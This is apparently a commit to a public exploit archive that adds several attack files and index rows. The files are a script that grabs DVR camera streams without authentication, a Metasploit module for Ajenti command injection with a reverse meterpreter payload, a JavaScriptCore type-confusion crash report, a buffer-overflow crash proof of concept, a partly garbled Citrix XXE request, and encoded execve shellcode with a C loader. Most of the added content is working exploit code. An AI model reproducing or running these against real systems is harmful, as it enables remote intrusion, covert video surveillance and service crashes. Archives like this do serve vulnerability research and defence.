diff --git a/exploits/hardware/webapps/47562.sh b/exploits/hardware/webapps/47562.sh new file mode 100755 index 000000000..c21ca9c26 --- /dev/null +++ b/exploits/hardware/webapps/47562.sh @@ -0,0 +1,67 @@ +# Title: iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure +# Date: 2019-10-29 +# Author: LiquidWorm +# Vendor:iSeeQ +# Link: http://www.iseeq.co.kr +# CVE: N/A + +#!/bin/bash +# +# +# iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure +# +# +# Vendor: iSeeQ +# Product web page: http://www.iseeq.co.kr +# Affected version: WH-H4 1.03R / 2.0.0.P +# +# Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality +# pictures which adopts high performance video processing chips and embedded +# Linux system. This advanced video digital platform is very useful to identify +# an object from a long distance. +# +# Desc: The DVR suffers from an unauthenticated and unauthorized live stream +# disclosure when get_jpeg script is called. +# +# Tested on: Boa/0.94.13 +# PHP/7.0.22 +# DVR Web Server +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2019-5539 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php +# +# +# 28.10.2019 +# + + +if [ "$#" -ne 2 ]; then + echo "Usage: $0 IP:PORT CHANNEL" + exit +fi +IP=$1 +CHANNEL=$2 +HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL" +STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F" " '{print $2}') +if [ "$STATUS" == "404" ]; then + echo "Target not vulnerable!" + exit +fi +echo "Collecting snapshots..." +for x in {1..10}; + do echo -ne $x + curl "$HOST" -o seq-$x.jpg -#; + sleep 0.8 + done +echo -ne "\nDone." +echo -ne "\nRendering video..." +ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4 +echo " done." +echo -ne "\nRunning animation..." +sleep 1 +cvlc clip.mp4 --verbose -1 -f vlc://quit \ No newline at end of file diff --git a/exploits/json/webapps/47560.rb b/exploits/json/webapps/47560.rb new file mode 100755 index 000000000..cf1b345c6 --- /dev/null +++ b/exploits/json/webapps/47560.rb @@ -0,0 +1,85 @@ +# Exploit Title: Ajenti 2.1.31 - Remote Code Exection (Metasploit) +# Date: 2019-10-29 +# Exploit Author: Onur ER +# Vendor Homepage: http://ajenti.org/ +# Software Link: https://github.com/ajenti/ajenti +# Version: 2.1.31 +# Tested on: Ubuntu 19.10 + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => "Ajenti 2.1.31 Remote Code Execution", + 'Description' => %q{ + This module exploits a command injection in Ajenti <= 2.1.31. + By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned. + }, + 'Author' => [ + 'Jeremy Brown', # Vulnerability discovery + 'Onur ER ' # Metasploit module + ], + 'References' => [ + ['EDB', '47497'] + ], + 'DisclosureDate' => '2019-10-14', + 'License' => MSF_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_PYTHON, + 'Privileged' => false, + 'Targets' => [ + [ 'Ajenti <= 2.1.31', {} ] + ], + 'DefaultOptions' => + { + 'RPORT' => 8000, + 'SSL' => 'True', + 'payload' => 'python/meterpreter/reverse_tcp' + }, + 'DefaultTarget' => 0 + )) + register_options([ + OptString.new('TARGETURI', [true, 'Base path', '/']) + ]) + end + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/view/login/normal" + }) + if res and res.code == 200 + if res.body =~ /'ajentiVersion', '2.1.31'/ + return Exploit::CheckCode::Vulnerable + elsif res.body =~ /Ajenti/ + return Exploit::CheckCode::Detected + end + end + vprint_error("Unable to determine due to a HTTP connection timeout") + return Exploit::CheckCode::Unknown + end + + + def exploit + print_status("Exploiting...") + random_password = rand_text_alpha_lower(7) + json_body = { 'username' => "`python -c \"#{payload.encoded}\"`", + 'password' => random_password, + 'mode' => 'normal' + } + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'), + 'ctype' => 'application/json', + 'data' => JSON.generate(json_body) + }) + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/47565.txt b/exploits/multiple/dos/47565.txt new file mode 100644 index 000000000..54eb100fb --- /dev/null +++ b/exploits/multiple/dos/47565.txt @@ -0,0 +1,102 @@ +The following JavaScript program, found by Fuzzilli and slightly modified, crashes JavaScriptCore built from HEAD and the current stable release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc): + + let notAGetterSetter = {whatever: 42}; + + function v2(v5) { + const v10 = Object(); + if (v5) { + const v12 = {set:Array}; + const v14 = Object.defineProperty(v10,"length",v12); + const v15 = (140899729)[140899729]; + } else { + v10.length = notAGetterSetter; + } + const v18 = new Uint8ClampedArray(49415); + v18[1] = v10; + const v19 = v10.length; + let v20 = 0; + while (v20 < 100000) { + v20++; + } + } + const v26 = v2(); + for (let v32 = 0; v32 < 1000; v32++) { + const v33 = v2(true); + } + + /* + Crashes with: + ASSERTION FAILED: from.isCell() && from.asCell()->JSCell::inherits(*from.asCell()->vm(), std::remove_pointer::type::info()) + ../../Source/JavaScriptCore/runtime/JSCast.h(44) : To JSC::jsCast(JSC::JSValue) [To = JSC::GetterSetter *] + 1 0x1111ada79 WTFCrash + 2 0x1111ada99 WTFCrashWithSecurityImplication + 3 0x10ffb8f55 JSC::GetterSetter* JSC::jsCast(JSC::JSValue) + 4 0x10ffaf820 JSC::DFG::AbstractInterpreter::executeEffects(unsigned int, JSC::DFG::Node*) + 5 0x10ff9f37b JSC::DFG::AbstractInterpreter::execute(unsigned int) + 6 0x10ff9def2 JSC::DFG::CFAPhase::performBlockCFA(JSC::DFG::BasicBlock*) + 7 0x10ff9d957 JSC::DFG::CFAPhase::performForwardCFA() + 8 0x10ff9d647 JSC::DFG::CFAPhase::run() + 9 0x10ff9cc61 bool JSC::DFG::runAndLog(JSC::DFG::CFAPhase&) + 10 0x10ff6c65b bool JSC::DFG::runPhase(JSC::DFG::Graph&) + 11 0x10ff6c625 JSC::DFG::performCFA(JSC::DFG::Graph&) + 12 0x110279031 JSC::DFG::Plan::compileInThreadImpl() + 13 0x110274fa6 JSC::DFG::Plan::compileInThread(JSC::DFG::ThreadData*) + 14 0x11052a9bb JSC::DFG::Worklist::ThreadBody::work() + 15 0x1111b3c69 WTF::AutomaticThread::start(WTF::AbstractLocker const&)::$_0::operator()() const + 16 0x1111b38a9 WTF::Detail::CallableWrapper::call() + 17 0x1102c433a WTF::Function::operator()() const + 18 0x1111f0350 WTF::Thread::entryPoint(WTF::Thread::NewThreadContext*) + 19 0x111285525 WTF::wtfThreadEntryPoint(void*) + 20 0x7fff5a7262eb _pthread_body + 21 0x7fff5a729249 _pthread_start + 22 0x7fff5a72540d thread_start + */ + +The assertion indicates that a JSCell is incorrectly downcasted to a GetterSetter [1] (a pseudo object used to implement property getters/setter). In non debug builds, a type confusion then follows. + +Below is my preliminary analysis of the cause of the bug. + +The function v2 is eventually JIT compiled by the FTL JIT compiler. Initially, it will create the following (pseudo) DFG IR for it: + +# Block 0 (before if-else): + 44: NewObject(...) + + +# Block 1 (the if part): + ... + // Code for const v15 = (140899729)[140899729]; + ForceOSRExit + Unreachable + +# Block 2 (the else part) + PutByOffset @44, notAGetterSetter + PutStructure + +# Block 3 (after the if-else): + ... + // Code for v10.length. Due to feedback from previous executions, DFG + // JIT speculates that the if branch will be taken and that it will see + // v10 with a GetterSetter for .length here + CheckStructure @44, structureWithLengthBeingAGetterSetter + 166: GetGetterSetterByOffset @44, .length // Load the GetterSetter object from @44 + 167: GetGetter @166 // Load the getter function from the GetterSetter + ... + + +Here, the end of block 1 has already been marked as unreachable due to the element load from a number which will always cause a bailout. + +Later, the global subexpression elimination phase [2] runs and does the following (which can be seen by enabling verbose CSE [3]): + +* It determines that the GetGetterSetterByOffset node loads the named property from the object @44 +* It determines that this property slot is assigned in block 2 (the else block) and that this block strictly dominates the current block (meaning that the current block can only be reached through block 2) + * This is now the case as block 1 does a bailout, so block 3 can never be reached from block 1 +* As such, CSE replaces the GetGetterSetterByOffset operation with the constant for |notAGetterSetter| (as that is what is assigned in block 2). + +At this point the IR is incorrect as the input to a GetGetter operation is expected to be a GetterSetter object, but in this case it is not. During later optimizations, e.g. the AbstractInterpreter relies on that invariant and casts the input to a GetterSetter object [4]. At that point JSC crashes in debug builds with the above assertion. It might also be possible to trigger the type confusion at runtime instead of at compile time but I have not attempted that. + + + +[1] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/runtime/GetterSetter.h#L43 +[2] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.h#L49 +[3] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGCSEPhase.cpp#L51 +[4] https://github.com/WebKit/webkit/blob/87064d847a0f1b22a9bb400647647fe4004a4ccd/Source/JavaScriptCore/dfg/DFGAbstractInterpreterInlines.h#L2811 \ No newline at end of file diff --git a/exploits/windows/dos/47563.py b/exploits/windows/dos/47563.py new file mode 100755 index 000000000..169626d57 --- /dev/null +++ b/exploits/windows/dos/47563.py @@ -0,0 +1,28 @@ +# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service +# Date: 2019-10-30 +# Vendor Homepage:https://www.alloksoft.com/ +# Software Link: https://www.alloksoft.com/wmv.htm +# Exploit Author: Nithoshitha S +# Tested Version: v4.6.1217 +# Tested on: Windows 7 x64 +# Windows XP SP3 + +# 1.- Run python code :poc.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey' +# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code' +# 5.- Click 'OK' and you will see a crash. + +# poc.py + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: +f=open("Evil.txt","w") +print "[+] Creating %s bytes evil payload.." %len(buffer) +f.write(buffer) +f.close() +print "[+] File created!" +except: +print "File cannot be created" \ No newline at end of file diff --git a/exploits/xml/webapps/47561.txt b/exploits/xml/webapps/47561.txt new file mode 100644 index 000000000..69bac20a5 --- /dev/null +++ b/exploits/xml/webapps/47561.txt @@ -0,0 +1,35 @@ +# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection +# Date: 2019-08-28 +# Exploit Author: Vahagn Vardanya +# Vendor Homepage:https://www.citrix.com/downloads/storefront/ +# Software Link: https://support.citrix.com/article/CTX251988 +# Version: +# Citrix StoreFront Server earlier than 1903 +# Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000) +# Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)# +# Tested on: Windows +# Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb + +# PoC + +POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1 +Content-Type: application/vnd.citrix.requesttoken+xml +Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd. +citrix.authenticateresponse-1+xml +Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 +X-Forwarded-For: 192.168.204.1 +X-Citrix-Agent: crm. +X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview +X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image +X-Citrix-IsUsingHTTPS: No +Host: 192.168.204.131 +Content-Length: 331 +Expect: 100-continue + +%xxe; ]>ahttp://secure-web.cisco.com/ +0.08:00:00 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e3b1663ee..30fc513e3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6582,6 +6582,8 @@ id,file,description,date,author,type,platform,port 47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows, 47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows, 47552,exploits/multiple/dos/47552.txt,"WebKit - Universal XSS in HTMLFrameElementBase::isURLAllowed",2019-10-28,"Google Security Research",dos,multiple, +47563,exploits/windows/dos/47563.py,"WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service",2019-10-30,"Nithoshitha S",dos,windows, +47565,exploits/multiple/dos/47565.txt,"JavaScriptCore - GetterSetter Type Confusion During DFG Compilation",2019-10-30,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41878,3 +41880,6 @@ id,file,description,date,author,type,platform,port 47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php, 47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php, 47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php, +47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json, +47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml, +47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 3f1b9c389..2e5fc06d0 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1008,3 +1008,4 @@ id,file,description,date,author,type,platform 47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux 47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux 47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux +47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux diff --git a/shellcodes/linux/47564.py b/shellcodes/linux/47564.py new file mode 100755 index 000000000..ea0702ceb --- /dev/null +++ b/shellcodes/linux/47564.py @@ -0,0 +1,133 @@ +# Title: Linux/x86 (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes) +# Author: Daniel Ortiz +# Date: 2019-10-30 +# Tested on: Linux 4.18.0-25-generic #26 Ubuntu +# Size: 47 bytes +# SLAE ID: PA-9844 + +#----------------------- execve ------------------------------------------------# + +global _start + +section .text + +_start: + + xor eax, eax + push eax + + ; PUSH //bin/sh (8 bytes) + + push 0x68732f2f + push 0x6e69622f + mov ebx, esp + + push eax + mov edx, esp + + push ebx + mov ecx, esp + + mov al, 11 + int 0x80 + +#------------------------ execve shellcode -------------------------------------# + +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + +#----------------------- Python Encoder ----------------------------------------# + +#!/usr/bin/python + +shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + +encoded = "" +encoded2 = "" + +rot = 8 + +print 'Encoded shellcode ...' + +for x in bytearray(shellcode) : + # NOT encoding + y = ~x + + # ROT 8 encoding + h = (y + rot)%256 + + encoded += '\\x' + encoded += '%02x' % (h & 0xff) + + encoded2 += '0x' + encoded2 += '%02x,' %(h & 0xff) + + +print encoded + +print encoded2 + +print 'Len: %d' % len(bytearray(shellcode)) + +#---------------------- Assembly Code ------------------------------------------# + + +global _start + +section .text +_start: + jmp short call_shellcode + +decoder: + pop esi + xor ecx, ecx + mov cl, 25 + + +decode: + + sub byte [esi], 8 + not byte [esi] + inc esi + loop decode + + jmp short EncodedShellcode + +call_shellcode: + + call decoder + + EncodedShellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87 + +#------------------------- final shellcode ----------------------------------------# + +unsigned char buf[] = + + +"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe" +"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff" +"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a" +"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8" +"\x13\x88"; + +#------------------------- C wrapper --------------------------------------------------# + +#include +#include + +unsigned char code[] = \ + +"\xeb\x0f\x5e\x31\xc0\xb0\x19\x80\x2e\x08\xfe" +"\xc8\x74\x08\x46\xeb\xf6\xe8\xec\xff\xff\xff" +"\x39\xc8\x58\x70\x37\x37\x7b\x70\x70\x37\x6a" +"\x71\x76\x91\xeb\x58\x91\xea\x5b\x91\xe9\xb8" +"\x13\x88"; + + +int main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); + +} \ No newline at end of file